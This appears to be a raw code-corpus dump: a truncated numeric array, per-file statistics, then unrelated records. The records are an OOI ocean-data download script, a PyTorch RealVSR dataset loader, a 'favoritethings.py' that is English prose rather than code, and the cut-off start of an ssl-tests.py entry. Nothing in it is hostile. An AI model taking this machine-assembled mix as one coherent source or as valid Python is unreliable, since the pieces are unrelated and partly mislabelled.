15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 21],[ 10 , 24],[ 10 , 27],[ 10 , 28],[ 10 , 30],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 10 , 37],[ 10 , 39],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 4 , 17],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 5 , 17],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 27],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 6 , 17],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 27],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 7 , 17],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 27],[ 7 , 28],[ 7 , 29],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 17],[ 8 , 21],[ 8 , 22],[ 8 , 23],[ 8 , 27],[ 8 , 28],[ 8 , 29],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 9 , 17],[ 9 , 21],[ 9 , 22],[ 9 , 23],[ 9 , 27],[ 9 , 28],[ 9 , 29],[ 9 , 33],[ 9 , 34],[ 9 , 35],[ 10 , 18],[ 10 , 21],[ 10 , 24],[ 10 , 25],[ 10 , 27],[ 10 , 30],[ 10 , 31],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 11 , 18],[ 11 , 21],[ 11 , 24],[ 11 , 25],[ 11 , 27],[ 11 , 30],[ 11 , 31],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 12 , 18],[ 12 , 21],[ 12 , 24],[ 12 , 25],[ 12 , 27],[ 12 , 30],[ 12 , 31],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 13 , 19],[ 13 , 22],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 14 , 19],[ 14 , 22],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 15 , 19],[ 15 , 22],[ 15 , 24],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 16 , 20],[ 16 , 23],[ 16 , 25],[ 16 , 26],[ 16 , 29],[ 16 , 31],[ 16 , 32],[ 16 , 34],[ 16 , 35],[ 16 , 36]]
| 102,012
| 102,012
| 0.313512
| 18,241
| 102,012
| 1.753303
| 0.002412
| 0.00469
| 0.006128
| 0.009193
| 0.986367
| 0.968545
| 0.965512
| 0.949722
| 0.94622
| 0.941311
| 0
| 0.466439
| 0.327903
| 102,012
| 1
| 102,012
| 102,012
| 0.000029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
bea3b924c447fee11cfef326cc6e60c18268f318
| 4,271
|
py
|
Python
|
sandbox/ooi_pioneer/download_OOIdata.py
|
IvanaEscobar/sandbox
|
71d62af2c112686c5ce26def35593247cf6a0ccc
|
[
"MIT"
] | null | null | null |
sandbox/ooi_pioneer/download_OOIdata.py
|
IvanaEscobar/sandbox
|
71d62af2c112686c5ce26def35593247cf6a0ccc
|
[
"MIT"
] | 3
|
2022-02-15T23:32:52.000Z
|
2022-03-28T21:35:12.000Z
|
sandbox/ooi_pioneer/download_OOIdata.py
|
IvanaEscobar/sandbox
|
71d62af2c112686c5ce26def35593247cf6a0ccc
|
[
"MIT"
] | null | null | null |
import requests
def load_data():
#NetCDF files of OOI Pioneer Profiler Moorings: Temperature, Salinity, Pressure, Density
urls = [
'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp01cnpm-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz',
'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp02pmci-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz',
'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp02pmco-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz',
'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp02pmui-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz',
'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp02pmuo-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz',
'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp03ispm-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz',
'https://erddap.dataexplorer.oceanobservatories.org/erddap/tabledap/ooi-cp04ospm-wfp01-03-ctdpfk000.nc?time%2Csea_water_practical_salinity_profiler_depth_enabled%2Csea_water_density_profiler_depth_enabled%2Csea_water_pressure_profiler_depth_enabled%2Csea_water_temperature_profiler_depth_enabled%2Csea_water_practical_salinity_profiler_depth_enabled_qc_agg%2Csea_water_density_profiler_depth_enabled_qc_agg%2Csea_water_pressure_profiler_depth_enabled_qc_agg%2Csea_water_temperature_profiler_depth_enabled_qc_agg%2Cz'
]
fnames = [ 'cp01cnpm',
'cp02pmci',
'cp02pmco',
'cp02pmui',
'cp02pmuo',
'cp03ispm',
'cp04ospm' ]
dataPath = '/scratch2/ivana/data/ooi-pioneer/'
for url, fname in zip(urls, fnames):
r = requests.get(url, allow_redirects=True)
open( (dataPath + fname + '.nc'), 'wb').write(r.content)
return print ("Loaded data in:\n%s" % dataPath)
| 147.275862
| 521
| 0.879653
| 572
| 4,271
| 5.952797
| 0.115385
| 0.164464
| 0.328928
| 0.20558
| 0.888106
| 0.888106
| 0.888106
| 0.888106
| 0.870191
| 0.870191
| 0
| 0.035048
| 0.058066
| 4,271
| 28
| 522
| 152.535714
| 0.811335
| 0.02037
| 0
| 0
| 0
| 0.304348
| 0.887162
| 0.007889
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0.043478
| 0
| 0.130435
| 0.043478
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
fe8da2a1ebf9600771ad7d0c388361d1fce1b3ec
| 15,584
|
py
|
Python
|
codes/data/RealVSR_dataset.py
|
AyeshaSadiqa/thesis
|
761eb0c37acd42707d52d4a6bfabe8ac566d8aa4
|
[
"Apache-2.0"
] | 77
|
2021-08-14T04:43:49.000Z
|
2022-03-08T13:41:10.000Z
|
codes/data/RealVSR_dataset.py
|
AyeshaSadiqa/thesis
|
761eb0c37acd42707d52d4a6bfabe8ac566d8aa4
|
[
"Apache-2.0"
] | 8
|
2021-10-30T14:52:11.000Z
|
2022-03-09T12:44:54.000Z
|
codes/data/RealVSR_dataset.py
|
AyeshaSadiqa/thesis
|
761eb0c37acd42707d52d4a6bfabe8ac566d8aa4
|
[
"Apache-2.0"
] | 7
|
2021-08-22T00:47:44.000Z
|
2022-03-08T10:25:54.000Z
|
import os.path as osp
import random
import pickle
import logging
import numpy as np
import cv2
import lmdb
import torch
import torch.utils.data as data
import data.util as util
logger = logging.getLogger('base')
class RealVSRDataset(data.Dataset):
"""
Reading the training REDS dataset
key example: 000_00000
GT: Ground-Truth;
LQ: Low-Quality, e.g., low-resolution/blurry/noisy/compressed frames
support reading N LQ frames, N = 1, 3, 5, 7
"""
def __init__(self, opt):
super(RealVSRDataset, self).__init__()
self.opt = opt
# temporal augmentation
self.interval_list = opt['interval_list']
self.random_reverse = opt['random_reverse']
logger.info(
'Temporal augmentation interval list: [{}], with random reverse is {}.'.
format(','.join(str(x) for x in opt['interval_list']), self.random_reverse)
)
self.half_N_frames = opt['N_frames'] // 2
self.GT_root, self.LQ_root = opt['dataroot_GT'], opt['dataroot_LQ']
self.data_type = self.opt['data_type']
self.LR_input = False if opt['GT_size'] == opt['LQ_size'] else True # low resolution inputs
#### directly load image keys
if self.data_type == 'lmdb':
self.paths_GT, _ = util.get_image_paths(self.data_type, opt['dataroot_GT'])
logger.info('Using lmdb meta info for cache keys.')
elif opt['cache_keys']:
logger.info('Using cache keys: {}'.format(opt['cache_keys']))
self.paths_GT = pickle.load(open(opt['cache_keys'], 'rb'))['keys']
else:
raise ValueError('Need to create cache keys (meta_info.pkl) by running [create_lmdb.py]')
# remove some sequences for testing
self.paths_GT = [
v for v in self.paths_GT if v.split('_')[0] not in
['008', '026', '029', '031', '042', '055', '058', '077', '105', '113',
'132', '135', '146', '155', '161', '167', '173', '175', '180', '181',
'189', '194', '195', '226', '232', '237', '241', '242', '247', '256',
'268', '275', '293', '309', '358', '371', '372', '379', '383', '401',
'409', '413', '426', '438', '448', '471', '478', '484', '490', '498']
]
assert self.paths_GT, 'Error: GT path is empty.'
if self.data_type == 'lmdb':
self.GT_env, self.LQ_env = None, None
elif self.data_type == 'img':
pass
else:
raise ValueError('Wrong data type: {}'.format(self.data_type))
def _init_lmdb(self):
self.GT_env = lmdb.open(self.opt['dataroot_GT'], readonly=True, lock=False, readahead=False, meminit=False)
self.LQ_env = lmdb.open(self.opt['dataroot_LQ'], readonly=True, lock=False, readahead=False, meminit=False)
def __getitem__(self, index):
if self.data_type == 'lmdb' and (self.GT_env is None or self.LQ_env is None):
self._init_lmdb()
scale = self.opt['scale']
GT_size = self.opt['GT_size']
key = self.paths_GT[index]
name_a, name_b = key.split('_')
center_frame_idx = int(name_b)
#### determine the neighbor frames
interval = random.choice(self.interval_list)
if self.opt['border_mode']:
direction = 1 # 1: forward; 0: backward
N_frames = self.opt['N_frames']
if self.random_reverse and random.random() < 0.5:
direction = random.choice([0, 1])
if center_frame_idx + interval * (N_frames - 1) > 49:
direction = 0
elif center_frame_idx - interval * (N_frames - 1) < 0:
direction = 1
# get the neighbor list
if direction == 1:
neighbor_list = list(
range(center_frame_idx, center_frame_idx + interval * N_frames, interval)
)
else:
neighbor_list = list(
range(center_frame_idx, center_frame_idx - interval * N_frames, -interval)
)
name_b = '{:05d}'.format(neighbor_list[0])
else:
# ensure not exceeding the borders
while (center_frame_idx + self.half_N_frames * interval > 49) or \
(center_frame_idx - self.half_N_frames * interval < 0):
center_frame_idx = random.randint(0, 49)
# get the neighbor list
neighbor_list = list(
range(center_frame_idx - self.half_N_frames * interval,
center_frame_idx + self.half_N_frames * interval + 1, interval)
)
if self.random_reverse and random.random() < 0.5:
neighbor_list.reverse()
name_b = '{:05d}'.format(neighbor_list[self.half_N_frames])
assert len(neighbor_list) == self.opt['N_frames'], \
'Wrong length of neighbor list: {}'.format(len(neighbor_list))
#### get the GT image (as the center frame)
GT_size_tuple = (3, 1024, 512)
if self.data_type == 'lmdb':
img_GT = util.read_img(self.GT_env, key, GT_size_tuple)
else:
img_GT = util.read_img(None, osp.join(self.GT_root, name_a, name_b + '.png'))
if self.opt['color']: # change color space if necessary
img_GT = util.channel_convert(img_GT.shape[2], self.opt['color'], [img_GT])[0]
#### get LQ images
LQ_size_tuple = (3, 1024, 512)
img_LQ_l = []
for v in neighbor_list:
img_LQ_path = osp.join(self.LQ_root, name_a, '{:05d}.png'.format(v))
if self.data_type == 'lmdb':
img_LQ = util.read_img(self.LQ_env, '{}_{:05d}'.format(name_a, v), LQ_size_tuple)
else:
img_LQ = util.read_img(None, img_LQ_path)
if self.opt['color']: # change color space if necessary
img_LQ = util.channel_convert(img_LQ.shape[2], self.opt['color'], [img_LQ])[0]
img_LQ_l.append(img_LQ)
if self.opt['phase'] == 'train':
C, H, W = LQ_size_tuple # LQ size
# randomly crop
if self.LR_input:
LQ_size = GT_size // scale
rnd_h = random.randint(0, max(0, H - LQ_size))
rnd_w = random.randint(0, max(0, W - LQ_size))
img_LQ_l = [v[rnd_h:rnd_h + LQ_size, rnd_w:rnd_w + LQ_size, :] for v in img_LQ_l]
rnd_h_HR = int(rnd_h * scale)
rnd_w_HR = int(rnd_w * scale)
img_GT = img_GT[rnd_h_HR:rnd_h_HR + GT_size, rnd_w_HR:rnd_w_HR + GT_size, :]
else:
rnd_h = random.randint(0, max(0, H - GT_size))
rnd_w = random.randint(0, max(0, W - GT_size))
img_LQ_l = [v[rnd_h:rnd_h + GT_size, rnd_w:rnd_w + GT_size, :] for v in img_LQ_l]
img_GT = img_GT[rnd_h:rnd_h + GT_size, rnd_w:rnd_w + GT_size, :]
# augmentation - flip, rotate
img_LQ_l.append(img_GT)
rlt = util.augment(img_LQ_l, self.opt['use_flip'], self.opt['use_rot'])
img_LQ_l = rlt[0:-1]
img_GT = rlt[-1]
# stack LQ images to NHWC, N is the frame number
img_LQs = np.stack(img_LQ_l, axis=0)
# BGR to RGB, HWC to CHW, numpy to tensor
if img_GT.shape[2] == 3:
img_GT = img_GT[:, :, [2, 1, 0]]
img_LQs = img_LQs[:, :, :, [2, 1, 0]]
img_GT = torch.from_numpy(np.ascontiguousarray(np.transpose(img_GT, (2, 0, 1)))).float()
img_LQs = torch.from_numpy(np.ascontiguousarray(np.transpose(img_LQs, (0, 3, 1, 2)))).float()
return {'LQs': img_LQs, 'GT': img_GT, 'key': key}
def __len__(self):
return len(self.paths_GT)
class RealVSRAllPairDataset(data.Dataset):
"""
Reading the training REDS dataset
key example: 000_00000
GT: Ground-Truth;
LQ: Low-Quality, e.g., low-resolution/blurry/noisy/compressed frames
support reading N LQ frames, N = 1, 3, 5, 7
"""
def __init__(self, opt):
super(RealVSRAllPairDataset, self).__init__()
self.opt = opt
# temporal augmentation
self.interval_list = opt['interval_list']
self.random_reverse = opt['random_reverse']
logger.info(
'Temporal augmentation interval list: [{}], with random reverse is {}.'.
format(','.join(str(x) for x in opt['interval_list']), self.random_reverse)
)
self.half_N_frames = opt['N_frames'] // 2
self.GT_root, self.LQ_root = opt['dataroot_GT'], opt['dataroot_LQ']
self.data_type = self.opt['data_type']
self.LR_input = False if opt['GT_size'] == opt['LQ_size'] else True # low resolution inputs
#### directly load image keys
if self.data_type == 'lmdb':
self.paths_GT, _ = util.get_image_paths(self.data_type, opt['dataroot_GT'])
logger.info('Using lmdb meta info for cache keys.')
elif opt['cache_keys']:
logger.info('Using cache keys: {}'.format(opt['cache_keys']))
self.paths_GT = pickle.load(open(opt['cache_keys'], 'rb'))['keys']
else:
raise ValueError('Need to create cache keys (meta_info.pkl) by running [create_lmdb.py]')
# remove some sequences for testing
if opt['remove_list']:
self.remove_list = pickle.load(open(opt['remove_list'], 'rb'))
self.paths_GT = [v for v in self.paths_GT if v.split('_')[0] not in self.remove_list]
logger.info('Remove sequences: {}'.format(self.remove_list))
else:
logger.info('Using all sequences for training.')
assert self.paths_GT, 'Error: GT path is empty.'
if self.data_type == 'lmdb':
self.GT_env, self.LQ_env = None, None
elif self.data_type == 'img':
pass
else:
raise ValueError('Wrong data type: {}'.format(self.data_type))
def _init_lmdb(self):
self.GT_env = lmdb.open(self.opt['dataroot_GT'], readonly=True, lock=False, readahead=False, meminit=False)
self.LQ_env = lmdb.open(self.opt['dataroot_LQ'], readonly=True, lock=False, readahead=False, meminit=False)
def __getitem__(self, index):
if self.data_type == 'lmdb' and (self.GT_env is None or self.LQ_env is None):
self._init_lmdb()
scale = self.opt['scale']
GT_size = self.opt['GT_size']
key = self.paths_GT[index]
name_a, name_b = key.split('_')
center_frame_idx = int(name_b)
#### determine the neighbor frames
interval = random.choice(self.interval_list)
if self.opt['border_mode']:
direction = 1 # 1: forward; 0: backward
N_frames = self.opt['N_frames']
if self.random_reverse and random.random() < 0.5:
direction = random.choice([0, 1])
if center_frame_idx + interval * (N_frames - 1) > 49:
direction = 0
elif center_frame_idx - interval * (N_frames - 1) < 0:
direction = 1
# get the neighbor list
if direction == 1:
neighbor_list = list(
range(center_frame_idx, center_frame_idx + interval * N_frames, interval)
)
else:
neighbor_list = list(
range(center_frame_idx, center_frame_idx - interval * N_frames, -interval)
)
name_b = '{:05d}'.format(neighbor_list[0])
else:
# ensure not exceeding the borders
while (center_frame_idx + self.half_N_frames * interval > 49) or \
(center_frame_idx - self.half_N_frames * interval < 0):
center_frame_idx = random.randint(0, 49)
# get the neighbor list
neighbor_list = list(
range(center_frame_idx - self.half_N_frames * interval,
center_frame_idx + self.half_N_frames * interval + 1, interval)
)
if self.random_reverse and random.random() < 0.5:
neighbor_list.reverse()
name_b = '{:05d}'.format(neighbor_list[self.half_N_frames])
assert len(neighbor_list) == self.opt['N_frames'], \
'Wrong length of neighbor list: {}'.format(len(neighbor_list))
#### get the GT image (as the center frame)
GT_size_tuple = (3, 1024, 512)
img_GT_l = []
for v in neighbor_list:
img_GT_path = osp.join(self.GT_root, name_a, '{:05d}.png'.format(v))
if self.data_type == 'lmdb':
img_GT = util.read_img(self.GT_env, '{}_{:05d}'.format(name_a, v), GT_size_tuple)
else:
img_GT = util.read_img(None, img_GT_path)
if self.opt['color']: # change color space if necessary
img_GT = util.channel_convert(img_GT.shape[2], self.opt['color'], [img_GT])[0]
img_GT_l.append(img_GT)
#### get LQ images
LQ_size_tuple = (3, 1024, 512)
img_LQ_l = []
for v in neighbor_list:
img_LQ_path = osp.join(self.LQ_root, name_a, '{:05d}.png'.format(v))
if self.data_type == 'lmdb':
img_LQ = util.read_img(self.LQ_env, '{}_{:05d}'.format(name_a, v), LQ_size_tuple)
else:
img_LQ = util.read_img(None, img_LQ_path)
if self.opt['color']: # change color space if necessary
img_LQ = util.channel_convert(img_LQ.shape[2], self.opt['color'], [img_LQ])[0]
img_LQ_l.append(img_LQ)
if self.opt['phase'] == 'train':
C, H, W = LQ_size_tuple # LQ size
# randomly crop
if self.LR_input:
LQ_size = GT_size // scale
rnd_h_LQ = random.randint(0, max(0, H - LQ_size))
rnd_w_LQ = random.randint(0, max(0, W - LQ_size))
img_LQ_l = [v[rnd_h_LQ:rnd_h_LQ + LQ_size, rnd_w_LQ:rnd_w_LQ + LQ_size, :] for v in img_LQ_l]
rnd_h_HR = int(rnd_h_LQ * scale)
rnd_w_HR = int(rnd_w_LQ * scale)
img_GT_l = [v[rnd_h_HR:rnd_h_HR + GT_size, rnd_w_HR:rnd_w_HR + GT_size, :] for v in img_GT_l]
else:
rnd_h = random.randint(0, max(0, H - GT_size))
rnd_w = random.randint(0, max(0, W - GT_size))
img_LQ_l = [v[rnd_h:rnd_h + GT_size, rnd_w:rnd_w + GT_size, :] for v in img_LQ_l]
img_GT_l = [v[rnd_h:rnd_h + GT_size, rnd_w:rnd_w + GT_size, :] for v in img_GT_l]
# augmentation - flip, rotate
rlt = [*img_LQ_l, *img_GT_l]
rlt = util.augment(rlt, self.opt['use_flip'], self.opt['use_rot'])
img_LQ_l = rlt[:len(neighbor_list)]
img_GT_l = rlt[len(neighbor_list):]
# stack LQ images to NHWC, N is the frame number
img_LQs = np.stack(img_LQ_l, axis=0)
img_GTs = np.stack(img_GT_l, axis=0)
# BGR to RGB, HWC to CHW, numpy to tensor
if img_GT.shape[2] == 3:
img_GTs = img_GTs[:, :, :, [2, 1, 0]]
img_LQs = img_LQs[:, :, :, [2, 1, 0]]
img_GTs = torch.from_numpy(np.ascontiguousarray(np.transpose(img_GTs, (0, 3, 1, 2)))).float()
img_LQs = torch.from_numpy(np.ascontiguousarray(np.transpose(img_LQs, (0, 3, 1, 2)))).float()
return {'LQs': img_LQs, 'GT': img_GTs, 'key': key}
def __len__(self):
return len(self.paths_GT)
if __name__ == '__main__':
pass
| 44.525714
| 115
| 0.565837
| 2,187
| 15,584
| 3.774577
| 0.115684
| 0.021199
| 0.040703
| 0.021805
| 0.903816
| 0.893883
| 0.887099
| 0.875833
| 0.862629
| 0.862144
| 0
| 0.031521
| 0.303773
| 15,584
| 350
| 116
| 44.525714
| 0.729309
| 0.086756
| 0
| 0.727612
| 0
| 0
| 0.100914
| 0
| 0
| 0
| 0
| 0
| 0.014925
| 1
| 0.029851
| false
| 0.011194
| 0.037313
| 0.007463
| 0.089552
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fe969d048701d14eed9d369e1417010d01908ad4
| 372
|
py
|
Python
|
favoritethings/favoritethings.py
|
OneOfaKindGeek/mycode
|
bbb4391b333aaa1667314b76393f2102c05a2571
|
[
"Apache-2.0"
] | null | null | null |
favoritethings/favoritethings.py
|
OneOfaKindGeek/mycode
|
bbb4391b333aaa1667314b76393f2102c05a2571
|
[
"Apache-2.0"
] | null | null | null |
favoritethings/favoritethings.py
|
OneOfaKindGeek/mycode
|
bbb4391b333aaa1667314b76393f2102c05a2571
|
[
"Apache-2.0"
] | null | null | null |
My favorite movie is endgame
my favorite videogame is witcher 3
my favorite show is whatever is filling time in this covid19 boredum
my favorite book series is mistborn
My favorite movie is endgame
my favorite videogame is witcher 3
my favorite show is whatever is filling time in this covid19 boredum
my favorite book series is mistborn
my favorite anime is castlevania
| 37.2
| 68
| 0.827957
| 63
| 372
| 4.888889
| 0.333333
| 0.292208
| 0.097403
| 0.11039
| 0.941558
| 0.941558
| 0.941558
| 0.941558
| 0.941558
| 0.941558
| 0
| 0.019481
| 0.172043
| 372
| 9
| 69
| 41.333333
| 0.980519
| 0
| 0
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
fe98ebad3aab78414e84a0b146dd9629b68b62dc
| 5,772
|
py
|
Python
|
auxil/broker/tests/python/ssl-tests.py
|
hugolin615/zeek-4.0.0-ele420520-spring2021
|
258e9b2ee1f2a4bd45c6332a75304793b7d44d40
|
[
"Apache-2.0"
] | null | null | null |
auxil/broker/tests/python/ssl-tests.py
|
hugolin615/zeek-4.0.0-ele420520-spring2021
|
258e9b2ee1f2a4bd45c6332a75304793b7d44d40
|
[
"Apache-2.0"
] | null | null | null |
auxil/broker/tests/python/ssl-tests.py
|
